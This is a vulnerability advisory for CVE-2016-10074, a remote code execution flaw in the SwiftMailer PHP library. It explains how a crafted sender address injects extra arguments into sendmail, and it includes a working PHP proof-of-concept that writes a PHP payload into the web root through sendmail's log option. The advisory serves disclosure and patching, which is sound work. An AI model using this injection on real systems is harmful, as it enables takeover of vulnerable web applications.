__                     __   __  __           __                 
   / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
 / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
/_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  

 <-- BACK TO legalhackers.com 

Follow @dawid_golunski ============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - CVE-2016-10074 - Release date: 30.12.2016 - Last revision: 29.12.2016 - Revision 3.0 - Severity: Critical ============================================= I. VULNERABILITY ------------------------- SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074) II. BACKGROUND ------------------------- "Swift Mailer is a component-based library for sending e-mails from PHP applications." "Swift Mailer began back in 2005 as a one-class project for sending mail over SMTP. It has since grown into the flexible component-based library that is in development today." SwiftMailer library is used by major PHP projects including some of the most popular PHP programming frameworks such as Yii2, Laravel, Symfony. https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/introduction.rst https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/overview.rst Symfony / Yii / Laravel frameworks: http://symfony.com/doc/current/email.html https://github.com/yiisoft/yii2-swiftmailer https://laravel.com/docs/5.1/mail III. INTRODUCTION ------------------------- An independent research uncovered a critical vulnerability in SwiftMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the SwiftMailer class. Update (29.12): Vendor has released the patch in version 5.4.5. Note: This advisory is limited. Remaining attack vectors/exploits will be disclosed at a later date to allow more time for patching. IV. DESCRIPTION ------------------------- SwiftMailer class uses PHP mail() function as its default transport. SwiftMailer suffers from the same vulnerability as the one disclosed in PHPMailer in the advisory at: http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html The following Sender address: "Attacker -Param2 -Param3"@test.com would cause SwiftMailer/mail() function to execute /usr/bin/sendmail with the following list of arguments: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fAttacker -Param2 -Param3@test.com] which would not work for the attacker (Param2 and Param3 are passed within the same argument of argv[3] ) Attackers can however break out of parameter no.3 with some extra escaping. For example, by injecting an extra sequence of \" after the first argument, the following Sender email: "Attacker \" -Param2 -Param3"@test.com when passed to SwiftMailer (and eventually to mail()) function would cause sendmail to execute with: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fAttacker\] Arg no. 4 == [-Param2] Arg no. 5 == [-Param3"@test.com] Which as can be seen would inject additional parameters of 4 & 5 to sendmail. Attackers can exploit this to achieve code execution as shown in the PoC below. V. PROOF OF CONCEPT EXPLOIT ------------------------- <?php /* SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074) Discovered/Coded by: Dawid Golunski https://legalhackers.com Full Advisory URL: https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html Video PoC https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html Follow the feed for updates: https://twitter.com/dawid_golunski A simple PoC (working on Sendmail MTA) It will inject the following parameters to sendmail command: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fattacker\] Arg no. 4 == [-oQ/tmp/] Arg no. 5 == [-X/var/www/cache/phpcode.php] Arg no. 6 == ["@email.com] which will write the transfer log (-X) into /var/www/cache/phpcode.php file. Note /var/www/cache must be writable by www-data web user. The resulting file will contain the payload passed in the body of the msg: 09607 <<< Content-Type: text/html; charset=us-ascii 09607 <<< 09607 <<< <?php phpinfo(); ?> 09607 <<< 09607 <<< 09607 <<< See the full advisory URL for the exploit details. */ // Attacker's input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form with sender/body fields $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com'; $msg_body = '<?php phpinfo(); ?>'; // ------------------ // mail() param injection via the vulnerability in SwiftMailer require_once 'lib/swift_required.php'; // Mail transport $transport = Swift_MailTransport::newInstance(); // Create the Mailer using your created Transport $mailer = Swift_Mailer::newInstance($transport); // Create a message $message = Swift_Message::newInstance('Swift PoC exploit') ->setFrom(array($email_from => 'PoC Exploit Payload')) ->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name')) ->setBody($msg_body); // Send the message with PoC payload in 'from' field $result = $mailer->send($message); ~~~~~~~~~~~ More advanced exploit targetting a contact form can be found at: https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py Video PoC: ~~~~~~~~~~~~~ https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html VI. BUSINESS IMPACT ------------------------- A successful exploitation could let remote attackers to gain access to the target server in the context of the web server account which could lead to a full compromise of the web application. VII. SYSTEMS AFFECTED ------------------------- All versions of SwiftMailer including the latest of 5.4.5-DEV are affected. Update (29.12): Vendor has released the patch in version 5.4.5. VIII. SOLUTION / VENDOR RESPONSE ------------------------- The vulnerability was responsibly disclosed to SwiftMailer vendor. The first contact attempts started on the 2nd of December. Unfortunatelly the vendor has not fixed the SwiftMailer library to date and the library remains vulnerable in its latest version (5.4.5-dev). Because of this, users of SwiftMailer (which includes various frameworks that make use of the library) remain at risk. The vendor was advised by the researcher of the upcoming exploit for another library (PHPMailer) which when published by the vendor/researcher, would make it possible for malicious users to "connect the dots" and use the same vectors/payloads to attack SwiftMailer users as they are almost identical. The last attempt of contact (resending the tested PoC exploit) was made on Dec 26th to which the vendor have not replied and little action seems to have been taken. As after the publication of PHPMailer exploit and patches other users on the Internet did start to see the similarities and file public vulnerability reports, there is no more point in keeping this advisory private. Keeping it private would only give more advantage to potential attackers. CVE MITRE assigned the following ID to this vulnerability: CVE-2016-10074 Update (29.12): Vendor has released the patch in version 5.4.5. IX. REFERENCES ------------------------- https://legalhackers.com This (CVE-2016-10074) advisory: https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html Video PoC: https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html https://www.youtube.com/watch?v=xyYMYvT2bx8 Exploit code: Simple PoC shown above is available here: https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt Combined exploit code for multiple targets: https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py Other exploits with other attack vectors will be disclosed at a later date to allow more time for patching. The previously undisclosed techniques and exploitation vectors will be described in a security white-paper at: https://legalhackers.com/papers/Pwning-PHP-mail-func-For-Fun-And-RCE-New-Exploit-Techniques-Vectors.html CVE-2016-10074 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10074 SwiftMailer github https://github.com/swiftmailer/swiftmailer X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com Thanks to SecuriTeam for help with the disclosure. XI. REVISION HISTORY ------------------------- 30.12.2016 - Updated exploit code 29.12.2016 - Update regarding the patch 28.12.2016 - Limited advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. Follow @dawid_golunski <-- BACK TO legalhackers.com